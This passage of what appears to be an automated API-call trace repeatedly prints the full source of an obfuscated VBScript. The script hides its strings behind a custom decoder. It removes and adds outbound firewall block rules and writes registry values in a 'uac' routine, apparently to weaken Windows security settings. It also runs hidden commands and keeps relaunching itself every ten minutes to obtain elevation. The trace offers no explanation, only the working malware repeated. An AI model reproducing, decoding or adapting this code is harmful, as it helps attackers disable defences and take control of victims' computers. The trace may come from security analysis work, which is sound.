bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.278] wcsncmp (_String1="esume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.278] wcsncmp (_String1="sume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.278] wcsncmp (_String1="ume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.278] wcsncmp (_String1="me Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 